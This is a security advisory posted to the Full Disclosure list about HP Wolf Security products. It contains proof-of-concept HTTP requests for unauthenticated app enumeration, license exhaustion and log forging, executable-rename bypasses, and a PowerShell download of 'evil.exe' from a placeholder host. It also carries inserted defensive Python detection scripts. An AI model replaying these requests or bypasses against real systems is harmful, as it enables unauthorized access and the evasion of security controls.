Message-ID: <AS1PR07MB84319C7BB081E60D8D060FB9B38BA@AS1PR07MB8431.eurprd07.prod.outlook.com>
Date: Thu, 8 May 2025 08:52:35 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Cc: SEC Consult Vulnerability Lab <security-research@...-consult.com>
Subject: [FD] SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP
 Wolf Security Controller and more

SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 >
Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise
=======================================================================
              title: Multiple Vulnerabilities 
            product: HP Wolf Security Controller / HP Sure Access Enterprise /
                     HP Sure Click Enterprise
 vulnerable version: HP Wolf Security Controller 4.3.127.238 & 4.4.155.291, 
                     HP Wolf Sure Click Enterprise Client Version 4.3.11.45 with 
                     Extensionpack Sure Access Enterprise 8.0.125,
                     HP Wolf Sure Click 4.4.3.274
      fixed version: TODO
         CVE number: TODO
             impact: High
           homepage: https://www.hp.com/us-en/security/enterprise-pc-security.html
              found: 2022-09-15 (Sure Access) & 2023-08-18 (Sure Click)
                 by: Daniel Hirschberger (Office Bochum)
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"HP Sure Access Enterprise uses hardware-enforced virtualization-based security
to isolate critical applications running on Microsoft Windows clients. The 
zero-trust solution is deployed on the user’s PC, beneath the operating system
(OS) layer, where it creates a hardware-protected virtual machine (VM) that is
completely isolated from the Windows OS. Through this innovative approach, the
solution secures a number of key assets, including memory and CPU state, disk
structures, keyboard input, display outputs, and network traffic.
Even if a user’s endpoint is compromised, it won’t pose any risk to the remote
application and the sensitive data it contains, allowing users to work securely
on multiple remote Privileged Access Workstations (PAWs) from a single device.
The user can only access the application through the hardware-protected VM, 
which remains isolated from the Windows OS—and any malware that might attack it."

Source: https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA7-6965ENW


"HP Sure Click Enterprise stops attacks and protects your endpoints by creating
micro–virtual machines (micro-VMs) that secure end-user tasks, from surfing the
web to opening email and downloading attachments. High-risk tasks are completely
isolated inside the micro-VM. When a task is closed, the micro-VM—and any threat
it contained—is disposed of without any breach.  Sure Click Enterprise is
powered by hardware-enforced isolation technology that uses virtualization-based
security on the host to contain threats inside individual, disposable micro-
VMs. This approach dramatically decreases attack surfaces, while preserving
familiar user workflows."

Source: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-6963ENW.pdf


Business recommendation:
------------------------
The vendor does not provide a patch because, according to HP, the issues are
configuration-related, product limitations, or out of scope of the products
themselves. See the statements below.

Customers must check whether they are enforcing authentication with TLS Client
Certificates for Sure Access, Sure Click and the HP Wolf Security Controller.
This is the intended and recommended configuration according to HP. Links to
their configuration guidelines can be found at the bottom in the "Solution"
section.

SEC Consult highly recommends performing a thorough security review of the
product, conducted by security professionals, to identify and resolve potential
further security issues.


General information:
--------------------
SEC Consult conducted penetration tests on Sure Access in 2022 and on Sure Click
in 2023 and established contact with HP afterwards. After several rounds of
emails and meetings with the product development team, the scope and limitations
of Sure Access and Sure Click were made clear. This advisory combines the results
of those penetration tests.

In summary, most of the issues we identified as vulnerabilities are not within
the scope or attacker model of Sure Access/Sure Click. Several issues can be
prevented by correctly configuring both products, e.g., by enforcing
authentication with TLS Client Certificates, according to HP.

The identified issues are grouped by affected product, and each is classified
as a vulnerability, a misconfiguration, or out of scope.

Statement from HP
-----------------

HP sent us a statement which can be summarized as follows:


Sure Click Enterprise considers the following out-of-scope:
- Malicious users
- Local administrators
- Malicious servers or infrastructure/server admins

Sure Access Enterprise considers the following out-of-scope:
- Malicious users with direct access to Sure Access Enterprise Apps and
  credentials to use them
- Malicious infrastructure/server admins
- Service availability on the endpoint
- Protection of resources which are not explicitly enrolled into Sure Access
  Enterprise


Vulnerability overview/description:
-----------------------------------
1) HP Wolf Security Controller

a) Misconfiguration: Missing Authentication and Authorization on the deviceAPI
Clients routinely contact the Security Controller server to refresh their
policies and send device logs to it.
Unfortunately, calling functions on the deviceAPI requires neither
authentication nor authorization.
Thus, any client can perform arbitrary deviceAPI actions, which leads to further
vulnerabilities.

b) Vulnerability: Missing CSRF Protection
The deviceAPI does not implement CSRF protection. This means that an
attacker who knows the internal IP of the Security Controller can prepare a
malicious link and trick users in the internal network into calling arbitrary
deviceAPI functions.

c) Misconfiguration: Unauthorized Access to other Applications
The Security Controller allows defining 'Applications' and assigning them to
individual devices or device groups. These applications are mostly HTTP(S), SSH
or RDP connections to specific hosts. When such an application is opened, a new 
micro-VM is spawned, the requested connection is established in the micro-VM and
the resulting UI is rendered in a separate window.
Because the deviceAPI requires neither authentication nor authorization, an
attacker can fetch any application from the server and subsequently access it.

d) Vulnerability: Missing Anti-Automation Protection
Because anti-automation measures are missing, an attacker can call the
/register/ endpoint of the deviceAPI repeatedly and burn through the available
licenses. This is not an issue in itself because the product still works even
if all licenses are used up.
Nonetheless, in combination with the next vulnerability an attacker is able
to generate a considerable amount of bogus logs in a short timeframe.

e) Vulnerability: Log Forging
Because of the unprotected deviceAPI an attacker can forge logs for any device.
This is especially devastating in combination with the missing self-protection
because an attacker can disable the Sure Access Enterprise client and forge logs
which show that the device is still protected.


2) HP Wolf Sure Access Enterprise Client
a) Out of Scope: Missing Self-Protection
A local operating system administrator account can just click on the button
labeled 'Disable' in the GUI of the client to deactivate the protection
altogether.

b) Out of Scope: Bypassing the RDP Interception
RDP connections which are started via mstsc.exe are usually intercepted by the
client and opened in a micro-VM which performs the RDP connection instead. The
user only sees the UI of the micro-VM and is asked to enter their RDP
credentials. This can be trivially bypassed by renaming mstsc.exe.


3) HP Wolf Sure Click Enterprise
a) Out of Scope: Bypassable File Execution Prevention
Each file which was downloaded through an HP Wolf virtualized browser is
marked as untrusted and can only be executed after the file has been scanned
for malicious code.
This can be bypassed by downloading a file through other means, e.g., with
PowerShell's Invoke-WebRequest cmdlet.
Another way to exploit this consists of bypassing the browser virtualization,
which will be described next.

b) Out of Scope: Bypassable Browser Virtualization
HP Wolf has a hard-coded list of executable names which should be executed
in a micro-VM. These applications get executed in HP's sandbox and only the GUI
is exposed to the user.

By renaming the browser executable, this can be easily bypassed, for example
by renaming firefox.exe to firefux.exe.

c) Out of Scope: Inadequate Self-Protection
Depending on the applied policy, an administrator can no longer easily
disable the protection through a button in the GUI as described previously.
However, they can kill the BrService.exe and BrHostSrv.exe processes, which
effectively disables the protection altogether.


Proof of concept:
-----------------
1) HP Wolf Security Controller
a) Missing Authentication and Authorization on the deviceAPI
While intercepting the communication between client and server, the following
request was observed:

-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/173-176-177-184-186-188-189/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45 
-------------------------------------------------------------------------------

This shows that there is no authentication and authorization check, meaning that 
this request can be repeated by an attacker and yields the same result
as if a valid client performed the request.


b) Missing CSRF Protection
From the previous request it is also clear that there is no CSRF protection on
the API. Thus, an attacker can craft a malicious link or webpage and trick a
user into sending arbitrary requests to the deviceAPI.

c) Unauthorized Access to other Applications
The missing authentication and authorization checks allow an attacker to access
arbitrary applications.
A device fetches its allowed applications with the following request:

-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/173-176-177-184-186-188-189/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45 
-------------------------------------------------------------------------------

The numbers 173-176-177-184-186-188-189 correspond to internal ids of the
applications. So this request fetches the applications with the ids 173, 176,
177, 184, 186, 188, 189.

The server answers with a JSON object which contains information about
these applications:

-------------------------------------------------------------------------------
HTTP/2 200 OK
[...] 

{
  "apps": [
    {
      "id": 173,
      "symbolic_id": 18,
      "configuration": {
        "binary": "QVNwYwAAAAAAAAAAAAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAADAAA[...]"
      }
    },
    [...]
  ]
}
-------------------------------------------------------------------------------

Attackers can easily extract the configuration for each existing application
even if they should not have access to it, just by enumerating ids and sending
the previous request.

For example:

-------------------------------------------------------------------------------
GET /deviceapi/protected-apps/0-1-2-3-[...]/ HTTP/2
Host: <IP OF SECURITY CONTROLLER>
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45 
-------------------------------------------------------------------------------

The server will respond with the configuration for each application.

The "binary" part of the configuration can be base64-decoded and written to a 
file, e.g., "decoded.bin".
Then an attacker can use the "BrProtectedAppCmd.exe" to start the application
just like the client does when double-clicking on an application:

-------------------------------------------------------------------------------
C:\Program Files\HP\Sure Click\ApplicationSupport\pvm\8.0.125\BrProtectedAppCmd.exe 
start decoded.bin
-------------------------------------------------------------------------------

The following image shows an example where the AppId of an HTTPS connection to
the HP Wolf Security Controller was guessed and accessed with this trick without
having the needed permission:

[advisory_arbitrary_apps.png]


d) Missing Anti-Automation Protection
The API is also missing an anti-automation protection. Therefore, an attacker
can repeat any API call without limit. Since HP Wolf Security works on a
per-license basis, an attacker can burn through licenses by repeatedly
calling the /register/ endpoint.

For example the following request can be repeated 100 times to use up 100
licenses:

-------------------------------------------------------------------------------
POST /deviceapi/register/ HTTP/2
Host: <SECURITY_CONTROLLER_IP>
Content-Type: multipart/form-data; boundary="07DC54E11C8A7E8BCA894ACC"
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
Content-Length: 533

--07DC54E11C8A7E8BCA894ACC
Content-Disposition: form-data; name="identifier"
Content-Type: application/json

{
  "api_version": 12,
  "computername": "test-001",
  "domainname": "example.test",
  "fingerprint": "h",
  "oem": 1,
  "token": "",
  "user_domainname": "",
  "username": ""
}

--07DC54E11C8A7E8BCA894ACC
Content-Disposition: form-data; name="version"
Content-Type: application/json

{
  "platform": 4096,
  "upgrade_code": "a",
  "version": "4.3.11.45"
}

--07DC54E11C8A7E8BCA894ACC--
-------------------------------------------------------------------------------

The following two images show the number of available licenses before and after
this attack.

[advisory_license_start.png]
[advisory_license_end.png]
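As an added detection example (not part of the advisory and not HP's code), the following Python script flags the three deviceAPI abuse patterns from findings a), c) and d) in reverse-proxy access logs: requests that reach the deviceAPI without a verified TLS client certificate, protected-apps requests that sweep application ids, and bursts of /register/ calls from one source. The log format, thresholds and sample lines are constructed for this example; the regex has to be adapted to whatever proxy sits in front of the Security Controller.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed access-log format, constructed for this example (not HP's own):
# <client_ip> <ISO-8601 time> "<METHOD> <path>" <status> <tls_client_verify>
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ts>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'(?P<status>\d{3}) (?P<verify>\S+)$'
)
APPS_RE = re.compile(r"^/deviceapi/protected-apps/(?P<ids>[\d-]+)/$")

REGISTER_WINDOW = timedelta(seconds=60)  # burst window for /register/
REGISTER_LIMIT = 5                       # registrations per window per IP
MAX_IDS_PER_REQUEST = 10                 # a real client asks for its own few apps


def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def is_enumeration(ids):
    """Id lists that look like a sweep rather than a device's assigned apps."""
    if len(ids) > MAX_IDS_PER_REQUEST:
        return True
    # consecutive ascending ids (0-1-2-3-...) are the PoC's enumeration pattern
    return len(ids) >= 4 and ids == list(range(ids[0], ids[0] + len(ids)))


def analyze(log_text):
    """Return (client_ip, finding, detail) tuples for suspicious deviceAPI use."""
    findings = []
    recent_registers = defaultdict(deque)  # ip -> timestamps inside the window
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or not rec["path"].startswith("/deviceapi/"):
            continue
        ip, ts, path = rec["ip"], rec["ts"], rec["path"]
        # (a) deviceAPI reached without a verified TLS client certificate: the
        # authentication HP's configuration guidance relies on is not in place
        if rec["verify"] != "SUCCESS":
            findings.append((ip, "no-client-cert", path))
        # (c) protected-apps id enumeration
        m = APPS_RE.match(path)
        if m:
            ids = [int(x) for x in m.group("ids").split("-")]
            if is_enumeration(ids):
                findings.append((ip, "app-enumeration", f"{len(ids)} ids"))
        # (d) /register/ burst from one source (license exhaustion, log noise)
        if rec["method"] == "POST" and path == "/deviceapi/register/":
            q = recent_registers[ip]
            q.append(ts)
            while ts - q[0] > REGISTER_WINDOW:
                q.popleft()
            if len(q) == REGISTER_LIMIT + 1:  # report once per burst
                findings.append((ip, "register-burst", f">{REGISTER_LIMIT}/60s"))
    return findings


def build_sample_log():
    """Constructed traffic: one legitimate client (10.0.0.21) and one abusive
    source (10.0.0.99) that sweeps app ids and registers eight times in 40 s."""
    base = datetime(2025, 4, 29, 9, 0, 0)
    lines = [
        f'10.0.0.21 {base.isoformat()} "GET /deviceapi/protected-apps/'
        f'173-176-177-184-186-188-189/" 200 SUCCESS',
        f'10.0.0.99 {(base + timedelta(seconds=60)).isoformat()} '
        f'"GET /deviceapi/protected-apps/0-1-2-3-4-5-6-7-8-9-10-11-12/" 200 NONE',
    ]
    for i in range(8):
        t = (base + timedelta(seconds=120 + 5 * i)).isoformat()
        lines.append(f'10.0.0.99 {t} "POST /deviceapi/register/" 200 NONE')
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, kind, detail in analyze(build_sample_log()):
        print(ip, kind, detail)
```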


e) Log Forging
The Security Controller allows any device to send bogus data and even spoof logs
of other clients.
For example the following request can be used to send a log message that
is dated in the year 2038:

-------------------------------------------------------------------------------
POST /deviceapi/log/ HTTP/2
Host: <SECURITY_CONTROLLER_IP>
Content-Type: multipart/form-data; boundary="B4D45404F92AA031B731E747"
Accept-Encoding: gzip, deflate
User-Agent: HP-Sure-Click/4.3.11.45
Content-Length: 1003

--B4D45404F92AA031B731E747
Content-Disposition: form-data; name="identifier"
Content-Type: application/json

{
  "api_version": 12,
  "computername": "test-001",
  "domainname": "example.test",
  "fingerprint": "anything",
  "oem": 1,
  "token": "deprecated",
  "user_domainname": "example.test",
  "username": "pentest"
}

--B4D45404F92AA031B731E747
Content-Disposition: form-data; name="logs"
Content-Type: application/json

[
  {
    "component": "Isolation",
    "msgtypeid_ex": 0,
    "params": {
      "msg": "Bromium restarted"
    },
    "params_ex": {},
    "severity": 6,
    "source": 257,
    "time": 2146777200,
    "version": "4.3.11.45"
  }
]

--B4D45404F92AA031B731E747
Content-Disposition: form-data; name="version"
Content-Type: application/json

{
  "platform": 4096,
  "upgrade_code": "anything",
  "version": "4.3.11.45"
}

--B4D45404F92AA031B731E747--
-------------------------------------------------------------------------------

A faked log message can be seen in the following image:

[advisory_log_forging.png]


This allows faking logs, and in combination with the missing anti-automation
protection an attacker can create a huge amount of noise, which renders the log
unusable.
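As an added example of the server-side checks that would have rejected the forged submission above (example code, not HP's implementation), the following Python validator binds a /deviceapi/log/ submission to a registered device and rejects log entries whose timestamp is implausible relative to the server clock. The device registry, the meaning of the token field and the tolerances are assumptions made for this example; the forged identifier and log entry are copied from the PoC request.

```python
from datetime import datetime, timedelta, timezone

MAX_FUTURE_SKEW = timedelta(minutes=5)  # tolerate small clock drift only
MAX_AGE = timedelta(days=30)            # older entries are replayed or bogus

# Constructed registry of enrolled devices. Assumption for this example: the
# identity established at /register/ time (fingerprint plus an issued token)
# is stored server-side and must match on every later deviceAPI call.
REGISTERED = {
    ("test-001", "example.test"): {"fingerprint": "a1b2c3", "token": "t0k3n-001"},
}

# The forged submission from the advisory's PoC (identifier and log entry).
FORGED_IDENTIFIER = {
    "api_version": 12, "computername": "test-001", "domainname": "example.test",
    "fingerprint": "anything", "oem": 1, "token": "deprecated",
    "user_domainname": "example.test", "username": "pentest",
}
FORGED_LOGS = [{
    "component": "Isolation", "msgtypeid_ex": 0,
    "params": {"msg": "Bromium restarted"}, "params_ex": {},
    "severity": 6, "source": 257, "time": 2146777200, "version": "4.3.11.45",
}]

# A constructed legitimate submission from the same device, for comparison.
LEGIT_IDENTIFIER = dict(FORGED_IDENTIFIER, fingerprint="a1b2c3", token="t0k3n-001")
EXAMPLE_NOW = datetime(2025, 4, 29, 9, 0, tzinfo=timezone.utc)
LEGIT_LOGS = [dict(FORGED_LOGS[0], time=int(EXAMPLE_NOW.timestamp()) - 60)]


class RejectedSubmission(ValueError):
    pass


def validate_identifier(identifier, registry=REGISTERED):
    """The submitting device must be enrolled and present its own credentials."""
    key = (identifier.get("computername"), identifier.get("domainname"))
    known = registry.get(key)
    if known is None:
        raise RejectedSubmission("unknown device")
    if identifier.get("fingerprint") != known["fingerprint"]:
        raise RejectedSubmission("fingerprint mismatch")
    if identifier.get("token") != known["token"]:
        raise RejectedSubmission("token mismatch")
    return key


def validate_logs(logs, now):
    """Each entry's timestamp must be plausible relative to the server clock."""
    for entry in logs:
        t = datetime.fromtimestamp(int(entry["time"]), tz=timezone.utc)
        if t - now > MAX_FUTURE_SKEW:
            raise RejectedSubmission(f"timestamp in the future: {t.date()}")
        if now - t > MAX_AGE:
            raise RejectedSubmission(f"timestamp too old: {t.date()}")
    return logs


def check_submission(identifier, logs, now=None):
    """Return None when the submission is acceptable, else the rejection reason."""
    now = now or datetime.now(timezone.utc)
    try:
        validate_identifier(identifier)
        validate_logs(logs, now)
    except RejectedSubmission as e:
        return str(e)
    return None


if __name__ == "__main__":
    print(check_submission(FORGED_IDENTIFIER, FORGED_LOGS, now=EXAMPLE_NOW))
    print(check_submission(LEGIT_IDENTIFIER, FORGED_LOGS, now=EXAMPLE_NOW))
    print(check_submission(LEGIT_IDENTIFIER, LEGIT_LOGS, now=EXAMPLE_NOW))
```

With TLS client certificates enforced as HP recommends, the certificate identity takes the place of the fingerprint/token binding assumed here; the timestamp check is useful either way.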


2) HP Wolf Sure Access Enterprise Client
a) Missing Self-Protection
The GUI contains a button labeled 'Disable' which local administrators
can click to disable the client.
The following image shows this GUI and highlights the button:

[advisory_deactivate.png]


b) Bypassing the RDP Interception
There is a registry key 
"HKLM\SOFTWARE\HP\Security Update Service\Policies\Untrusted.ProcessNeedsProtectedAppHooking"
with the value "mstsc.exe,RDCMan.exe,ASGRD.exe,mRemoteNG.exe".
This shows that the client only matches on the file names of the executables.
Therefore one can copy these executables from the system folder to another
location and rename them to bypass the RDP interception.

For mstsc.exe the following steps have to be performed:
1. Copy "C:\Windows\System32\mstsc.exe" to the Desktop.
2. Rename it to "mymstsc.exe".
3. Search for "mstsc.exe.mui" in C:\Windows\System32. This should return a
   folder with your local language identifier, e.g., /en-GB/ or /de-DE/, which
   contains the "mstsc.exe.mui" file.
4. Create this language folder next to your "mymstsc.exe".
5. Copy the "mstsc.exe.mui" from the language folder in System32 to the newly
   created one and rename it so that the name of the .exe matches the name of
   the .mui file, e.g., "mymstsc.exe.mui".
6. Double-click on "mymstsc.exe" and the usual RDP GUI will start. Now you can
   RDP to another machine without the RDP interception.

3) HP Wolf Sure Click Enterprise
a) Bypassable File Execution Prevention
All files which are downloaded through an application which is virtualized by HP
Wolf Security (mostly browsers), are flagged as untrusted. When a user tries to
open or execute the file, HP Wolf scans the file and if it is deemed trustworthy
a user can remove the flag and open/execute it.

Unfortunately, only files which are acquired via virtualized browsers are
flagged. Therefore, an attacker can easily bypass this protection by using
alternative download options, for example a PowerShell command:

> Invoke-WebRequest -Uri https://example.test/evil.exe -OutFile evil.exe

This file does not possess the flag and can directly be opened/executed.
Another way to bypass this protection is based on bypassing the browser
virtualization feature.


b) Bypassable Browser Virtualization
Similar to the RDP Interception bypass described earlier, the Sure Click
client has a blacklist of applications which should be spawned in a micro-VM.

[working_browser_virtualization.png]

Therefore, the same trick can be reused to bypass this as well.
For example, the "firefox.exe" executable is part of this blacklist.
By copying the "C:\Program Files\Mozilla Firefox\" folder to the user's desktop
and renaming the contained "firefox.exe" to "firefux.exe", this can be bypassed.

[bypassed_browser_virtualization.png]
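As an added example for the rename bypasses in 2b and 3b (not the vendor's code), the following Python scan hashes the installed copies of the protected executables and reports any file under the scanned roots that has identical content but a different name, which is exactly what name-based matching misses. The directory layout and file contents are constructed for the demo; on a real host the search directories would be System32 and the browser install folder, and the scan roots the user profiles.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Executable names the client keys on, taken from the advisory (the RDP
# interception registry value plus the browser example). A renamed copy has a
# different name but identical content, so this scan keys on content instead.
PROTECTED_NAMES = ["mstsc.exe", "RDCMan.exe", "ASGRD.exe", "mRemoteNG.exe",
                   "firefox.exe"]


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def resolve_references(search_dirs, names=PROTECTED_NAMES):
    """Locate the installed copies of the protected binaries (e.g. System32,
    the Firefox install folder) whose hashes serve as the reference set."""
    found = []
    for d in search_dirs:
        for n in names:
            p = Path(d) / n
            if p.is_file():
                found.append(p)
    return found


def find_renamed_copies(reference_files, scan_roots):
    """Return (path, canonical_name) for every file under scan_roots whose
    content equals a protected binary but whose file name differs."""
    refs = {sha256_of(p): Path(p).name.lower() for p in reference_files}
    hits = []
    for root in scan_roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                p = Path(dirpath) / name
                canonical = refs.get(sha256_of(p))
                if canonical and name.lower() != canonical:
                    hits.append((str(p), canonical))
    return sorted(hits)


def build_sample_tree(base):
    """Constructed scenario: a fake System32 holding mstsc.exe and a user
    desktop holding the advisory's renamed copy 'mymstsc.exe' plus an
    unrelated file. Returns (reference search dirs, scan roots)."""
    base = Path(base)
    system32 = base / "Windows" / "System32"
    desktop = base / "Users" / "alice" / "Desktop"
    system32.mkdir(parents=True)
    desktop.mkdir(parents=True)
    fake_mstsc = b"MZ constructed stand-in for mstsc.exe bytes"
    (system32 / "mstsc.exe").write_bytes(fake_mstsc)
    (desktop / "mymstsc.exe").write_bytes(fake_mstsc)   # renamed copy
    (desktop / "notes.txt").write_bytes(b"unrelated content")
    return [system32], [base / "Users"]


def run_demo():
    """Build the sample tree in a temp dir and report renamed copies by name."""
    with tempfile.TemporaryDirectory() as tmp:
        search_dirs, roots = build_sample_tree(tmp)
        refs = resolve_references(search_dirs)
        return [(Path(p).name, canonical)
                for p, canonical in find_renamed_copies(refs, roots)]


if __name__ == "__main__":
    print(run_demo())   # [('mymstsc.exe', 'mstsc.exe')]
```

The scan only catches byte-identical copies of the installed binaries, which is the rename technique the advisory describes; a modified or differently versioned binary needs a different control such as application allow-listing.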


c) Inadequate Self-Protection
As an improvement to the situation, the self-protection can no longer be
easily disabled in the GUI if a strong policy is applied.
However, by killing the services "BrService.exe" and "BrHostSrv.exe", a local
administrator can still crash and therefore bypass the protection.

[sure_click_disabled.png]


Vulnerable / tested versions:
-----------------------------
The following product versions have been tested in September 2022:
* HP Wolf Security Controller 4.3.127.238
* HP Sure Click Enterprise Client Version 4.3.11.45 with
  Extensionpack Sure Access Enterprise 8.0.125 

The following product versions have been tested in August 2023:
* HP Wolf Security Controller 4.4.155.291
* HP Wolf Sure Click 4.4.3.274

Vendor contact timeline:
------------------------
The vulnerability was identified in September 2022. Initially a third
party did the coordination, but the information to HP got lost and we
re-established our responsible disclosure process later.

2023-09-21: Customer gives permission to contact vendor
2023-10-11: Sending the advisories to HP
2023-10-13: Senior Manager of HP Germany contacts us
2023-10-18: Same Senior Manager sends us feedback from the Product Owner
2023-12-01: Same Senior Manager requests a meeting between SEC Consult and the
            Product Owner at HP
2024-01-30: Meeting with Product Owner and Development Team of HP;
            due to time constraints we agree to hold a second meeting
2024-03-13: Second Meeting with Product Owner and Development Team
2024-03-26: Updating the advisory with the statements of the Product Owner
2024-05-21: Asking for a status update.
2024-05-22: Vendor: currently working internally; will ask the product team
            for an update
2024-07-18: Asking for a status update.
2024-07-26: Vendor will get back to us at the latest 2024-08-12 with a detailed
            response
2024-08-08: We receive a detailed email clarifying the scope of the products and
            their opinion on the issues (e.g. misconfiguration)
2024-10-09: We agree that most of the issues could be misconfigurations, provide
            our view and declare our intent to publish an advisory which clearly
            mentions the possibility of misconfigurations.
            Regarding CSRF, we clarify the risks again.
            Vendor asks where the advisory will be published.
2024-10-11: We inform the vendor that the advisory will be published
            at https://sec-consult.com/vulnerability-lab/, the Full
            Disclosure Mailing list and we will link to it via Twitter/X and 
            LinkedIn.
2024-10-21: We merge the two existing HP Wolf Security advisories into one,
            add 'Statements from HP' verbatim and prefix each finding with
            the category, e.g. Misconfiguration, Out of Scope, Vulnerability.
            We send the updated advisory to the vendor and ask for a link
            to their best practices regarding configuration.
2024-11-12: We ask for a status update and state that we want to publish
            soon.
2024-11-18: Status: The product team is working on it.
2025-01-13: We are asking for a status update and, due to the lengthy
            disclosure process, we set a deadline for publication for
            mid-February at the latest.
2025-02-05: HP sends us a list of documentation we can link to in the
            advisory.
2025-02-06: We ask if there are patched versions we can link to in the
            advisory.
2025-03-19: ^
2025-04-16: We communicate that we want to publish on 2025-04-28 and provide
            them with the latest version of this advisory.
2025-04-29: Advisory was published.

Solution:
---------
Customers have to check if their installation is configured according to HP's
best practices:

https://enterprisesecurity.hp.com/s/documentation

HP Sure Click Enterprise:
Solution Brief: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-7470ENUS.pdf
Data Sheet: https://h20195.www2.hp.com/v2/getpdf.aspx/4AA7-6963ENW.pdf
Documentation: https://documentation.bromium.com/4_4/Release%20Notes/HP%20Sure%20Click%20Enterprise%204.4%20Release%208%20Update%201%20-%20Release%20Notes.pdf

HP Sure Access Enterprise:
Solution Brief : https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA8-1466ENW
Data Sheet: https://h20195.www2.hp.com/v2/GetDocument.aspx?docname=4AA8-1110ENW
Documentation: https://documentation.bromium.com/4_4/Release%20Notes/HP%20Sure%20Access%20Enterprise%208.1%20Release%204%20Release%20Notes.pdf
Deployment Guide: https://documentation.bromium.com/8_1/Release%20Notes/HP%20Sure%20Access%20Enterprise%208.1%20Release%203%20-%20Deployment%20Guide.pdf


Workaround:
-----------
None   


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab 
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2025
